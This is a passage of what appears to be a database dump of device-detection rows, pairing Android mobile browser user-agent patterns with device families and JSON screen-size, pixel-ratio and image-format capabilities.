Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx Note 10 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 11; xx Note 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; CPH2145) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 3 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 3a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":808,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G996B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-A526B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-A528B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-A725F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G780G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G781B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G981B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G988B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G991B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G991U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G996B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":3.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-G998U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-N770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-N975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 12; SM-N980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ADR6300) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc_adr','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ADR6350) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc_adr','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ADR8995 4G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc_adr','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL ONE TOUCH 4010A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL ONE TOUCH 4010D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL ONE TOUCH 4010X) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL ONE TOUCH 918D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL ONE TOUCH 991D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL_one_touch_906Y) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL_one_touch_983) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ALCATEL_one_touch_995) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Alcatel OT-980A) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Android edition xx sfr STARADDICT) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Arctic350) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; C8600) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; CM980) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Desire_A8181) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Droid) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_verizon','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; E15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; FIRST XS350 2G FT3001PM) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Fly IQ245 Plus) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Fly IQ245) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_fly','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-B5510-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-B5510L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":240,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-B7510) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I5500) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I5500L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I5510L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I5800) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":400,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I8150) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I8160) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I8160P-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I8530) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9000) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9000-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9000T) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9001) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9003) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9070) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9070P) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9100) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9100P) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-I9100P-ORANGE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-N7000) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; GT-P1000) 